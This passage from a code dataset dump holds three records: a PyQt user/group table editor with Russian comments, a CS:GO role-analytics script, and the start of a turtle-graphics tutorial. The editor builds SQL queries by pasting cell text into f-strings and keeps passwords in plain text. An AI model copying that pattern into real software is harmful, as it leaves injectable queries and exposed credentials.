query.exec(qStr):\n\t\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалос�� добавить строку:\\n' + query.lastError().text())\n\t\t\t\treturn\n\t\t\tself.getLastId(i)\n\n\t# Получение последнего добавленного id таблицы пользователи-группы\n\tdef getLastIdUserGroups(self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tqStr = f\"SELECT last_insert_rowid()\"\n\t\tif not query.exec(qStr) or not query.next():\n\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось выбрать последнюю строку:\\n' + query.lastError().text())\n\t\t\treturn\n\t\tself.ui.twListInMain.item(i ,0).setData(Qt.UserRole, query.value(0))\n\n\t# Получение последнего добавленного id\n\tdef getLastId (self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tqStr = f\"SELECT last_insert_rowid()\"\n\t\tif not query.exec(qStr) or not query.next():\n\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось выбрать последнюю строку:\\n' + query.lastError().text())\n\t\t\treturn\n\t\tself.ui.twSimple.item(i ,0).setData(Qt.UserRole, query.value(0))\n\n\t# Обновление таблицы пользователи\n\tdef updateTableUsers(self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tif self.ui.twSimple.item(i ,0).text() and self.ui.twSimple.item(i ,1).text():\n\t\t\tname = self.ui.twSimple.item(i ,0).text()\n\t\t\tpassword = self.ui.twSimple.item(i ,1).text()\n\t\t\tidC = self.ui.twSimple.item(i, 0).data(Qt.UserRole)\n\t\t\tqStr = f\"UPDATE users SET name = '{name}', password = '{password}' WHERE id = {idC}\"\n\t\t\tif not query.exec(qStr):\n\t\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось обновить строку:\\n' + query.lastError().text())\n\t\t\t\treturn\n\n\t# Обновление таблицы группы\n\tdef updateTableGroups(self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tif self.ui.twSimple.item(i ,0).text():\n\t\t\tname = self.ui.twSimple.item(i ,0).text()\n\t\t\tidC = self.ui.twSimple.item(i, 0).data(Qt.UserRole)\n\t\t\tqStr = f\"UPDATE groups SET name = '{name}' WHERE id = {idC}\"\n\t\t\tif not query.exec(qStr):\n\t\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось обновить строку:\\n' + query.lastError().text())\n\t\t\t\treturn\n\t\t\n\t# Проверка на действие с элементом (добавить/обновить)\t\n\tdef updateTable(self):\n\t\tfor i in range(self.ui.twSimple.rowCount()):\n\t\t\tif self.ui.twSimple.item(i, 0).data(Qt.UserRole) == 0:\n\t\t\t\tif self.ui.tableWidget.currentRow() == 0:\n\t\t\t\t\tself.insertToTableUsers(i)\n\t\t\t\tif self.ui.tableWidget.currentRow() == 1:\n\t\t\t\t\tself.insertToTableGroups(i)\n\t\t\telse:\n\t\t\t\tif self.ui.tableWidget.currentRow() == 0:\n\t\t\t\t\tself.updateTableUsers(i)\n\t\t\t\tif self.ui.tableWidget.currentRow() == 1:\n\t\t\t\t\tself.updateTableGroups(i)\n\t\t\t\t\t\n\t# Обработчик смены элемента в таблице с именами таблиц из БД\n\t@pyqtSlot()\n\tdef on_tableWidget_itemSelectionChanged(self):\n\t\tif not len(self.ui.tableWidget.selectedItems()):\n\t\t\treturn\n\t\titem = self.ui.tableWidget.selectedItems()[0]\n\t\tself.prepareTables(item.data(Qt.UserRole))\n\t\tself.remove.clear()\n\n\t# Подготовка таблиц редактирования\n\tdef prepareTables(self, dataList):\n\t\tif dataList[1]:\n\t\t\tself.prepareSimple(dataList[0])\n\t\telse:\n\t\t\tself.prepareConnection(dataList[0])\n\n\t# Обработчик смены элемента в таблице с ролями\n\t@pyqtSlot()\n\tdef on_twMain_itemSelectionChanged(self):\n\t\tif not len(self.ui.twMain.selectedItems()):\n\t\t\treturn\n\t\titem = self.ui.twMain.selectedItems()[0]\n\t\tself.prepareUserGroupsСompliance(item.data(Qt.UserRole))\n\t\tself.remove.clear()\n\t\tself.userId.clear()\n\n\t# Подготовка таблиц редактирования\n\tdef prepareTables(self, dataList):\n\t\tif dataList[1]:\n\t\t\tself.prepareSimple(dataList[0])\n\t\telse:\n\t\t\tself.prepareConnection(dataList[0])\n\n\t# Обработчик стрелочки добавления\n\t@pyqtSlot()\n\tdef on_tbtnAddTo_clicked(self):\n\t\tif self.ui.twAll.currentRow() >= 0:\n\t\t\tuser = self.ui.twAll.item(self.ui.twAll.currentRow(),0).text()\n\t\t\tlastStr = self.ui.twListInMain.rowCount()\n\t\t\tself.ui.twListInMain.insertRow(lastStr)\n\t\t\tself.ui.twListInMain.setItem(lastStr, 0, QTableWidgetItem(user))\n\t\t\tself.ui.twListInMain.item(lastStr, 0).setData(Qt.UserRole, 0)\n\n\t# Обработчик стрелочки удаления\n\t@pyqtSlot()\n\tdef on_tbtnRemoveFrom_clicked(self):\n\t\tif self.ui.twListInMain.currentRow() >= 0:\n\t\t\titem = self.ui.twListInMain.currentRow()\n\t\t\tidC = self.ui.twListInMain.item(item, 0).data(Qt.UserRole)\n\t\t\tif idC != 0:\n\t\t\t\tself.remove.append(idC)\n\t\t\tself.ui.twListInMain.removeRow(item)\n\n\t# Подготовка таблиц типа \"Связка\"\n\tdef prepareConnection(self, name):\n\t\tself.ui.stackedWidget.setCurrentIndex(1)\n\t\tif name == 'user_groups':\n\t\t\tres = self.prepareUserGroups()\n\t\telse:\n\t\t\tres = False\n\t\tif res:\n\t\t\tself.ui.actionAdd.setEnabled(False)\n\t\t\tself.ui.actionDelete.setEnabled(False)\n\t\t\tself.ui.actionSave.setEnabled(True)\n\t\telse:\n\t\t\tself.ui.actionAdd.setEnabled(False)\n\t\t\tself.ui.actionDelete.setEnabled(False)\n\t\t\tself.ui.actionSave.setEnabled(False)\n\t\t\n\t# Подготовка простых таблиц\n\tdef prepareSimple(self, name):\n\t\tself.ui.stackedWidget.setCurrentIndex(0)\n\t\tself.tableName = name\n\t\t\n\t\tif name == 'users':\n\t\t\tres = self.prepareUsers()\n\t\telif name == 'groups':\n\t\t\tres = self.prepareGroups()\n\t\telse:\n\t\t\tres = False\n\t\tif res:\n\t\t\tself.ui.actionAdd.setEnabled(True)\n\t\t\tself.ui.actionDelete.setEnabled(True)\n\t\t\tself.ui.actionSave.setEnabled(True)\n\t\telse:\n\t\t\tself.ui.actionAdd.setEnabled(False)\n\t\t\tself.ui.actionDelete.setEnabled(False)\n\t\t\tself.ui.actionSave.setEnabled(False)\n\t\t\n\t# Подготовка таблицы пользователей\n\tdef prepareUsers(self):\n\t\tself.ui.twSimple.setRowCount(0)\n\t\tself.ui.twSimple.setColumnCount(2)\n\t\tself.ui.twSimple.setHorizontalHeaderItem(0, QTableWidgetItem('Имя пользователя'))\n\t\tself.ui.twSimple.setHorizontalHeaderItem(1, QTableWidgetItem('Пароль'))\n\t\t\n\t\tquery = QSqlQuery(self.db)\n\t\tstr = 'SELECT id, name, password FROM users'\n\t\t\n\t\tif not query.exec(str):\n\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось получить список пользователей:\\n' + query.lastError().text())\n\t\t\treturn False\n\t\t\n\t\ti = 0\n\t\twhile query.next():\n\t\t\tself.ui.twSimple.insertRow(i)\n\t\t\tself.ui.twSimple.setItem(i, 0, QTableWidgetItem(query.value(1)))\n\t\t\tself.ui.twSimple.setItem(i, 1, QTableWidgetItem(query.value(2)))\n\t\t\tself.ui.twSimple.item(i, 0).setData(Qt.UserRole, query.value(0))\n\t\t\ti += 1\n\t\tself.ui.twSimple.resizeColumnsToContents()\n\t\treturn True\n\t\n\t# Подготовка таблицы групп\n\tdef prepareGroups(self):\n\t\tself.ui.twSimple.setRowCount(0)\n\t\tself.ui.twSimple.setColumnCount(1)\n\t\tself.ui.twSimple.setHorizontalHeaderItem(0, QTableWidgetItem('Наименование группы'))\n\t\t\n\t\tquery = QSqlQuery(self.db)\n\t\tstr = 'SELECT id, name FROM groups'\n\t\t\n\t\tif not query.exec(str):\n\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось получить список групп:\\n' + query.lastError().text())\n\t\t\treturn False\n\t\t\n\t\ti = 0\n\t\twhile query.next():\n\t\t\tself.ui.twSimple.insertRow(i)\n\t\t\tself.ui.twSimple.setItem(i, 0, QTableWidgetItem(query.value(1)))\n\t\t\tself.ui.twSimple.item(i, 0).setData(Qt.UserRole, query.value(0))\n\t\t\ti += 1\n\t\tself.ui.twSimple.resizeColumnsToContents()\n\t\treturn True\n\t\n\t# Подготовка таблицы пользователи-группы\n\tdef prepareUserGroups(self):\n\t\tself.ui.twMain.clear()\n\t\tself.ui.twMain.setColumnCount(1)\n\t\tself.ui.twMain.setRowCount(0)\n\t\tself.ui.twMain.setHorizontalHeaderItem(0, QTableWidgetItem('Роли'))\n\t\tself.ui.twMain.horizontalHeader().setStretchLastSection(True)\n\t\t\n\t\tquery = QSqlQuery(self.db)\n\t\tstr = 'SELECT id, name FROM groups'\n\t\t\n\t\tif not query.exec(str):\n\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось получить список групп:\\n' + query.lastError().text())\n\t\t\treturn False\n\t\t\n\t\ti = 0\n\t\twhile query.next():\n\t\t\tself.ui.twMain.insertRow(i)\n\t\t\tself.ui.twMain.setItem(i, 0, QTableWidgetItem(query.value(1)))\n\t\t\tself.ui.twMain.item(i, 0).setData(Qt.UserRole, query.value(0))\n\t\t\tself.ui.twMain.item(i, 0).setFlags(Qt.ItemIsSelectable|Qt.ItemIsEnabled)\n\t\t\ti += 1\n\t\tself.ui.twMain.resizeColumnsToContents()\n\t\tself.ui.twAll.clear()\n\t\tself.ui.twAll.setColumnCount(1)\n\t\tself.ui.twAll.setRowCount(0)\n\t\tself.ui.twAll.setHorizontalHeaderItem(0, QTableWidgetItem('Пользователи'))\n\t\tself.ui.twAll.horizontalHeader().setStretchLastSection(True)\n\t\t\n\t\t\n\t\tquery = QSqlQuery(self.db)\n\t\tstr = 'SELECT id, name FROM users'\n\t\t\n\t\tif not query.exec(str):\n\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось получить список пользователей:\\n' + query.lastError().text())\n\t\t\treturn False\n\t\t\n\t\ti = 0\n\t\twhile query.next():\n\t\t\tself.ui.twAll.insertRow(i)\n\t\t\tself.ui.twAll.setItem(i, 0, QTableWidgetItem(query.value(1)))\n\t\t\tself.ui.twAll.item(i, 0).setData(Qt.UserRole, query.value(0))\n\t\t\tself.ui.twAll.item(i, 0).setFlags(Qt.ItemIsSelectable|Qt.ItemIsEnabled)\n\t\t\ti += 1\n\t\tself.ui.twAll.resizeColumnsToContents()\n\t\treturn True\n\n\t# Подготовка таблицы пользователей в определенной группе\n\tdef prepareUserGroupsСompliance(self, data):\n\t\tself.ui.twListInMain.clear()\n\t\tself.ui.twListInMain.setRowCount(0)\n\t\tself.ui.twListInMain.setColumnCount(1)\n\t\tself.ui.twListInMain.setHorizontalHeaderItem(0, QTableWidgetItem('Назначенные на роль'))\n\t\tself.ui.twListInMain.horizontalHeader().setStretchLastSection(True)\n\t\t\n\t\tquery = QSqlQuery(self.db)\n\t\tstr = f'SELECT user_id FROM user_groups WHERE group_id = {data}'\n\t\t\n\t\tif not query.exec(str):\n\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось получить список пользователей в этой группе:\\n' + query.lastError().text())\n\t\t\treturn False\n\n\t\twhile query.next():\n\t\t\tself.userId.append(query.value(0))\n\n\t\tfor i in range(0, len(self.userId)):\n\t\t\tuserId = self.userId[i]\n\t\t\tstr = f'SELECT name FROM users WHERE id = {userId}'\n\t\t\tif not query.exec(str):\n\t\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось получить имя пользователя:\\n' + query.lastError().text())\n\t\t\t\treturn False\n\t\t\twhile query.next():\n\t\t\t\tself.ui.twListInMain.insertRow(i)\n\t\t\t\tself.ui.twListInMain.setItem(i, 0, QTableWidgetItem(query.value(0)))\n\t\t\t\tself.ui.twListInMain.item(i, 0).setData(Qt.UserRole, self.userId[i])\n\t\t\t\tself.ui.twListInMain.item(i, 0).setFlags(Qt.ItemIsSelectable|Qt.ItemIsEnabled)\n\t\t\tself.ui.twListInMain.resizeColumnsToContents()\n\t\treturn True","repo_name":"uGodNick/python-table","sub_path":"src/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":18167,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41502898428","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 7 19:09:32 2021\n\nMake method to loop through single round to determine which player fills what role\ncreate train set size vs accuracy graph\n\nThe General Making Choices Approach\n\n####Raymond To-Do####\nTRADE_KILL \n\n####Grant To-Do####\n\n####PreGame##### Making use of Clustering \n\nFinish clustering with new features, classify test set into clusters, make a new column for cluster\nDetermine success and faiulure statistics for team comp matchups (Team Gamma vs Team Omega)\n - 11111 vs 01342\n - Who is 11111's best and worst matchup\nDetermine which individual team comp is the most winningest -\n - 11111 win rate alone\nWin percentage of team comp before and after switch\n - How does 11111 do on T vs CT?\nIf matchup between team is bad, AI system could recommend different comp\n\nDo individual players occupy different clusters?\nCheck if individual players occur in different games? \n\n\n\n####MidGame/Post-Plant Applied Statistics#####\n\nWithin +-5 seconds of A site bomb plant determine where T players are playing (boxes) regardless of the round outcome\nLook at their team comp-> is it a succeessful team comp? Or do they lose bc of the wrong combination of players and match up. \nDo they play in the positions we think are supposed to succeed based off heat maps or statistics of successful box loactions for individual player types, their clusters? Or do they succeed from new postions? How is the team spread spatially?\n We can extract spatial features of player sot one another and bombsite and perform statistics on what wins\n\n# # # (Later) Have AI learn from each role (guess best move for each role)\n\n@author: Grant\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n#import seaborn as sns\nimport os\nimport pickle\nfrom src import Writer\nimport sim as sim\nwriter = Writer()\n\n#make empty df \ndata = pd.DataFrame()\n\niterations = 245\n\n#gets copy of original data\\\nwriter.main()\ndata = writer.get_data()\n\n#reading\nwith open('file_to_rounds.txt', 'rb') as handle:\n _input = handle.read()\n \n\n#dictionary\nfile_to_rounds = pickle.loads(_input)\n\n#main df\ncolumn_names = ['ID','Health','damage','kills','rifle','sniper','pistol','smg',\n 'grenade','preplant kill','postplant kill','fast_kill_rating (first_kill)',\n 'time of kills','total kills','total deaths', 'avg kill time', \n 'assists', 'team','positioning type', 'last x', 'last y', \n 'alone kills', 'distance to A bomb (on kill list)', 'Avg Distance to A bomb (on kill)',\n 'times in catwalk_box', 'times in topmid_box', 'times in chair_box', 'times in midlane_box', 'times in underpass_box', 'times in window_box',\\\n 'times in stairs_box', 'times in tetris_box', 'times in sandwhich_box', 'times in Asite_box', 'times in firebox_box', 'times in jungle_box', 'times in connector_box',\n 'times in opening_box', 'times in opening2_box', 'times in A_main_box', 'times in T_ramp_box', 'times in hell_box', 'times in palace_box', 'times in pillars_box', \n 'times in ticket_box', 'times in CT_ramp_box', 'alone_death', 'total_distance_traveled']\n\nmain_df = pd.DataFrame(columns = column_names)\n\n#get all player ids\ndef find_team_ids(file):\n list_of_ct_ids = []\n list_of_t_ids = []\n\n game_data = data[(data['file'] == file) & (data['round'] < 16) & (data['att_id'] != 0)]\n for index, row in game_data.iterrows():\n if row['att_side'] == \"CounterTerrorist\":\n if row['att_id'] not in list_of_ct_ids:\n list_of_ct_ids.append(row['att_id'])\n \n else:\n if row['att_id'] not in list_of_t_ids:\n list_of_t_ids.append(row['att_id'])\n \n return list_of_ct_ids, list_of_t_ids\n\ndef distance_between_points(P, Q):\n \n x1 = P[0]\n x2 = Q[0]\n y1 = P[1]\n y2 = Q[1]\n \n result = ((((x2 - x1 )**2) + ((y2-y1)**2) )**0.5)\n return result\n\ndef all_roles_in_round(df, file, rnds): \n \n############################### VARIABLES ###############################\n ct_list, t_list = find_team_ids(file)\n\n #print(\"ct\", ct_list)\n #print(\"t\", t_list)\n \n if len(ct_list) < 5:\n #print(\"CT LIST TOO SMALL:\", len(ct_list))\n #print(\"Skipping\")\n return\n \n if len(t_list) < 5:\n #print(\"T LIST TOO SMALL:\", len(t_list))\n #print(\"Skipping\")\n return\n \n \n \n ''' GAME VARIABLES '''\n #ID, Health, damage, kills, rifle, sniper, pistol, smg, grenade, preplant kill(9), \n # postplant kill, fast_kill_rating (first_kill), time of kills, total kills(13), \n #total deaths, avg kill time, assists, 'team', positioning type (att or vic)(18), \n # last x (vic/att), last y(vic/att), alone kills, \n # distance to A bomb (on kill list), Avg Distance to A bomb (on kills)\n #'times in catwalk_box', 'times in topmid_box', 'times in chair_box', 'times in midlane_box', 'times in underpass_box', 'times in window_box'(29), \n #'times in stairs_box', 'times in tetris_box', 'times in sandwhich_box', 'times in Asite_box', 'times in firebox_box', 'times in jungle_box', 'times in connector_box',\n # 'times in opening_box', 'times in opening2_box', 'times in A_main_box', 'times in T_ramp_box', 'times in hell_box', 'times in palace_box', 'times in pillars_box', \n # 'times in ticket_box', 'times in CT_ramp_box', alone_death, total_distance_traveled (47)\n \n ct_player_1 = [ct_list[0], 100, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [], 0, 0, 0, 0, \"CounterTerrorist\", \"N/A\", 0, 0, 0, [], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ct_player_2 = [ct_list[1], 100, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [], 0, 0, 0, 0, \"CounterTerrorist\", \"N/A\", 0, 0, 0, [], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ct_player_3 = [ct_list[2], 100, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [], 0, 0, 0, 0, \"CounterTerrorist\", \"N/A\", 0, 0, 0, [], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ct_player_4 = [ct_list[3], 100, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [], 0, 0, 0, 0, \"CounterTerrorist\", \"N/A\", 0, 0, 0, [], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ct_player_5 = [ct_list[4], 100, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [], 0, 0, 0, 0, \"CounterTerrorist\", \"N/A\", 0, 0, 0, [], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n \n t_player_1 = [t_list[0], 100, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [], 0, 0, 0, 0, \"Terrorist\", \"N/A\", 0, 0, 0, [], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n t_player_2 = [t_list[1], 100, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [], 0, 0, 0, 0, \"Terrorist\", \"N/A\", 0, 0, 0, [], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n t_player_3 = [t_list[2], 100, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [], 0, 0, 0, 0, \"Terrorist\", \"N/A\", 0, 0, 0, [], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n t_player_4 = [t_list[3], 100, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [], 0, 0, 0, 0, \"Terrorist\", \"N/A\", 0, 0, 0, [], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n t_player_5 = [t_list[4], 100, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [], 0, 0, 0, 0, \"Terrorist\", \"N/A\", 0, 0, 0, [], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n \n \n \n all_players = [ct_player_1, ct_player_2, ct_player_3, ct_player_4, ct_player_5, \n t_player_1, t_player_2, t_player_3, t_player_4, t_player_5]\n \n \n ''' ROUNDS LOOP '''\n \n # single_game = data[(data['file'] == file)]\n # highest_round = single_game.loc[single_game['round'].idxmax()]\n # print(\"Running file\", file,\"with max round\", highest_round['round'], \"...\")\n # for i in range(1, highest_round['round'] + 1):\n \n rounds = rnds\n print(\"Running file\", file, \"with\", len(rounds), \"rounds...\")\n for i in rounds:\n \n #reset health at beginning of round\n for player in all_players:\n player[1] = 100\n\n \n ''' ROUND VARIABLES '''\n first_dmg_turn_counter = 20\n first_dmg_award = [1,1,2,2,3,3,4,4,5,5]\n first_dmg_index = len(first_dmg_award) - 1\n assists = []\n \n ''' ROWS LOOP '''\n print(\"Running round\", i,\"...\")\n single_round = data[(data['round'] == i) & (data['file'] == file)]\n \n for index, row in single_round.iterrows():\n '''when a player dies in row do calculations then'''\n victim = []\n attacker = []\n kill_flag = False\n for curr_player in all_players:\n pos_data = np.array([[row['attacker_mapX'], row['attacker_mapY']], [row['victim_mapX'], row['victim_mapY']]])\n x, y = pos_data.T\n \n if curr_player[0] == row['vic_id']:\n victim = curr_player\n \n #Set postioning type == VIC\n victim[18] = \"VIC\"\n \n #total distance travel (victim check)\n if victim[19] and victim[20] != 0: \n \n victim[47] += abs(distance_between_points([victim[19], victim[20]],[x[1], y[1]]))\n # print(victim[1])\n # print(\"victim last known x/y (\", victim[19], victim[20], \")\")\n # print(\"victim current x/y (\", x[1], y[1], \")\" )\n # print(\"victim DBP: \", abs(distance_between_points([victim[19], victim[20]],[x[1], y[1]])))\n # print(\"victim total distance: \", victim[47])\n # print()\n \n #Set last x and last y\n victim[19] = row['victim_mapX']\n victim[20] = row['victim_mapY']\n \n victim[1] -= row['hp_dmg']\n \n if curr_player[0] == row['att_id']:\n attacker = curr_player\n \n #Set postioning type == ATT\n attacker[18] = \"ATT\"\n \n #total distance travel (attacker check)\n if attacker[19] and attacker[20] != 0: \n attacker[47] += abs(distance_between_points([attacker[19], attacker[20]],[x[0], y[0]]))\n # print(attacker[1])\n # print(\"attacker last known x/y (\", attacker[19], attacker[20], \")\")\n # print(\"attacker current x/y (\", x[0], y[0], \")\" )\n # print(\"attacker DBP: \", abs(distance_between_points([attacker[19], attacker[20]],[x[0], y[0]])))\n # print(\"attacker total distance: \", attacker[47])\n # print()\n \n \n #Set last x and last y\n attacker[19] = row['attacker_mapX']\n attacker[20] = row['attacker_mapY']\n \n attacker[2] += row['hp_dmg']\n \n if len(attacker) != 0 and len(victim) != 0:\n \n #if a attacker does damage give him an assist,\n if ([attacker[0], victim[0]]) not in assists:\n assists.append([attacker[0], victim[0]])\n \n \n if victim[1] <= 0 and kill_flag == False:\n kill_flag = True\n \n \n #alone kill and alone death\n alone_kill = True\n alone_death = True\n distance_to_nearest_teammate = 99999\n for player in all_players:\n if ((player[17] == attacker[17]) and (player[1] > 0) and player[0] != attacker[0]):\n result = distance_between_points([player[19], player[20]], [attacker[19], attacker[20]])\n if result < distance_to_nearest_teammate:\n distance_to_nearest_teammate = result\n if result < 400:\n alone_kill = False\n if ((player[17] == victim[17]) and (player[1] > 0) and player[0] != victim[0]):\n result2 = distance_between_points([player[19], player[20]], [victim[19], victim[20]])\n if result2 < distance_to_nearest_teammate:\n distance_to_nearest_teammate = result2\n if result2 < 400:\n alone_death = False\n \n if alone_kill == True:\n attacker[21] += 1\n if alone_death == True:\n victim[46] += 1\n\n #remove assist from list when they kill\n assists.remove([attacker[0], victim[0]])\n attacker[3] += 1\n \n if row['wp_type'] == 'Rifle':\n attacker[4] += 1\n if row['wp_type'] == 'Sniper':\n attacker[5] += 1\n if row['wp_type'] == 'Pistol':\n attacker[6] += 1\n if row['wp_type'] == 'SMG':\n attacker[7] += 1\n if row['wp_type'] == 'Grenade':\n attacker[8] += 1\n if row['is_bomb_planted'] != True:\n attacker[9] += 1\n if row['is_bomb_planted'] == True:\n attacker[10] += 1\n if first_dmg_turn_counter > 0 and attacker[11] == 0 and first_dmg_index >= 0:\n attacker[11] = first_dmg_award[first_dmg_index]\n first_dmg_index -= 1\n attacker[12].append(row['seconds'])\n attacker[13] += 1\n victim[14] += 1\n \n #Append distance to A bomb on kill\n attacker[22].append(abs(distance_between_points([attacker[19], attacker[20]], sim.CenterA)))\n \n \n #mid boxes and A_site boxes check (attacker only)\n if row['att_id'] == attacker[0]:\n \n index_counter = 0\n for box in sim.list_of_boxes:\n if (box[0] < x[0] < box[2]) and (box[3] < y[0] < box[1]):\n #print(\"Attacker\", row['att_id'], \"in\", box[4],\"box\")\n #print(index_counter)\n if index_counter == 0:\n attacker[24] += 1\n \n elif index_counter == 1:\n attacker[25] += 1\n \n elif index_counter == 2:\n attacker[26] += 1\n \n elif index_counter == 3:\n attacker[27] += 1\n \n elif index_counter == 4:\n attacker[28] += 1\n \n elif index_counter == 5:\n attacker[29] += 1 \n \n elif index_counter == 6:\n attacker[30] += 1\n \n elif index_counter == 7:\n attacker[31] += 1\n \n elif index_counter == 8:\n attacker[32] += 1\n \n elif index_counter == 9:\n attacker[33] += 1\n \n elif index_counter == 10:\n attacker[34] += 1\n \n elif index_counter == 11:\n attacker[35] += 1\n \n elif index_counter == 12:\n attacker[36] += 1\n \n elif index_counter == 13:\n attacker[37] += 1\n \n elif index_counter == 14:\n attacker[38] += 1\n \n elif index_counter == 15:\n attacker[39] += 1\n \n elif index_counter == 16:\n attacker[40] += 1\n \n elif index_counter == 17:\n attacker[41] += 1\n \n elif index_counter == 18:\n attacker[42] += 1\n \n elif index_counter == 19:\n attacker[43] += 1\n \n elif index_counter == 20:\n attacker[44] += 1\n \n else:\n attacker[45] += 1\n index_counter += 1\n \n \n\n ''' POST ROUND CHECKS '''\n for player in all_players:\n \n time_delta = 0\n #assists checks\n if len(assists) > 0:\n for assist_pair in assists:\n if assist_pair[0] == player[0]:\n player[16] += 1\n assists.remove(assist_pair)\n \n #average time of kills\n if player[12] and len(player[12]) > 1:\n for i in range(len(player[12])):\n if (i + 1) < (len(player[12])):\n time_delta += player[12][i+1] - player[12][i]\n else:\n #will get more accurate each round and harder to change\n player[15] = time_delta/(len(player[12]) - 1)\n \n #average of distance to A bomb kills \n if player[22] and len(player[22]) > 1:\n for i in range(len(player[22])):\n if (i + 1) < (len(player[22])):\n time_delta += player[22][i+1] - player[22][i]\n else:\n #will get more accurate each round and harder to change\n player[23] = abs(time_delta/(len(player[22]) - 1))\n\n ''' POST ROUND VARIABLE CHANGES '''\n first_dmg_turn_counter -= 1\n \n \n \n players_df = pd.DataFrame(all_players)\n players_df.columns = column_names\n return players_df\n \n \nall_files = data.file.unique()\n\n\n\nfor f,rnd in file_to_rounds.items():\n round_df = all_roles_in_round(data, f, rnd)\n main_df = main_df.append(round_df, ignore_index = True)\n \n \n# for f in all_files:\n# if index == iterations:\n# break\n# round_df = all_roles_in_round(data, f)\n# #print('--------------------------------------')\n# main_df = main_df.append(round_df, ignore_index = True)\n \n# index += 1\n\n#Remove outlier players with a K/D less than 0.2\n# main_df = main_df.loc[main_df['total deaths'] > 0]\n# main_df = main_df.loc[main_df['total kills']/main_df['total deaths'] > 0.2]\n\n#main_df.to_csv('doNOTdelete.csv', index = False, encoding='utf-8')\n \nmain_df = main_df.drop(['time of kills', 'Health', 'team', 'positioning type', 'last x', 'last y', 'distance to A bomb (on kill list)'], axis=1)\npd.set_option(\"display.max_rows\", None, \"display.max_columns\", None, 'expand_frame_repr', False)\n\n#save to csv\nmain_df.to_csv('with_file_to_rounds.csv', index = False, encoding='utf-8')\n \n\n\n\n \n \n \n\n\n\n\n\n","repo_name":"G-Armstrong/CSGO-Spatial-Analytics","sub_path":"roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":21363,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"19642390040","text":"#!/usr/bin/python\n# coding:utf-8\n\nimport turtle \n\n# 画布即绘图区域相关\n'''\n方式一:screensize\n参数为:宽,高,颜色\n'''\n#turtle.screensize(canvwidth=400, canvheight=300, bg='blue')\n\n'''\n方式二: setup\nwidth, height 为整数时,表示像素;若为浮点数时,表示栈屏幕的比例,默认情况下width为0.5,height为0.75\nstartx,starty 表示左上角顶点的位置,以像素为单位,默认窗口居中\n 若starx为正,表示从左侧开始计算,若为负,则从右侧边缘开始计算\n 若starty为正,表示从顶部计算,若为负,表示从下边缘计算\n'''\nturtle.setup(width=0.5, height=0.75, startx=0, starty=0)\n\n# 设置箭头不可见,别名: ht\nturtle.hideturtle()\n# 设置箭头可见,别名: st\nturtle.showturtle()\n# 获取箭头是否可见\nisShow = turtle.isvisible()\nprint(isShow)\n# 设置画笔的位置为原点,即为turtle.goto(0,0) turtle.setheading(0)\nturtle.home()\n# 设置画笔的颜色和填充颜色\nturtle.color(color1, color2)\n\n\n'''\n# 画笔相关\n# 设置画笔宽度;别名: width\nturtle.pensize(width=10)\n# 设置画笔的颜色,可使用字符串如\"blue\"或者RGB值比如(255,2,55)\nturtle.pencolor('blue')\n# 画笔移动时,不绘制;别名: pu | up\nturtle.penup()\n# 画笔移动时,绘制;别名: pd | down\nturtle.pendown()\n# 画笔是否在绘制,若pendown则True,若penup则False\nturtle.isdown()\n# 